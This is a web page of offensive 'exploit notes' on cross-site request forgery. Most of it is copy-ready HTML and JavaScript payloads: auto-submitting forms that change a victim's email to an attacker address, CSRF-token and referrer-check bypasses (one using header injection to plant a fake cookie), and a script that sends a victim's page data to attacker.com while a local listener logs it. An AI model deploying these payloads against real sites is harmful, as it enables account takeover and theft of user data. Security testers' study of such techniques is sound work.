Exploit Notes

CSRF (Cross-Site Request Forgery)

Last modified: 2023-03-03

Web

CSRF is an attacking methodology that forces an end user to execute unexpected actions on a web application. CSRF is an attack against a user's web browser.

Account Takeover

If the victim user access to the page where the payload put in, the victim account information will be changed to the attacker's information e.g. Email address or Username.

<form method="POST" action="https://example.com/change-email">
    <input type="hidden" name="email" value="attacker@attack.com">
</form>
<script>
    document.forms[0].submit();
</script>

CSRF Token Bypass

Below is to bypass CSRF token by using another CSRF token that we get.

<form method="POST" action="https://example.com/change-email">
    <input type="hidden" name="email" value="attacker@attack.com">
    <input type="hidden" name="csrf" value="PqORuKZMr9zIJxpZC2cA8BgHuQGVkW8h">
</form>
<script>
    document.forms[0].submit();
</script>
<form method="POST" action="https://example.com/change-email">
    <input type="hidden" name="email" value="attacker@attack.com">
</form>
<img src="https://example.com/?search=attack%0d%0aSet-Cookie:%20csrf=fake" onerror="document.forms[0].submit();">

Referrer Validation

Referrer validation may be enabled depending on the website.
If so, we can try to bypass the validation by manipulating the browser's session history stack.

<meta name="referrer" content="no-referrer">

<form method="POST" action="https://example.com/change-email">
    <input type="hidden" name="email" value="attacker@attack.com">
</form>
<script>
    // For referrer validation....
    history.pushState("", "", "/?example.com");
    
    document.forms[0].submit();
</script>

Reveal Another User Information

We can retrieve the information of the another user account which accesses to the web page where the payload inserted.
Most of the time, this attack can be executed if the web page allows us to XSS.

Force Requesting to Our Server

Start web server in local machine for looking at the access log information.

sudo python3 -m http.server 80

Now send POST request with the victim's information in the target website.
For example, assume the target web page contains the current logged-in user information in the element of the id named "userinfo".

<script>
var secret = document.getElementById('userinfo');
var request = new XMLHttpRequest();
request.open('GET', 'http://attacker.com/' + secret, false);
request.send();
</script>

After a while, we can retrieve access logs contain the information of victims in local machine.

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.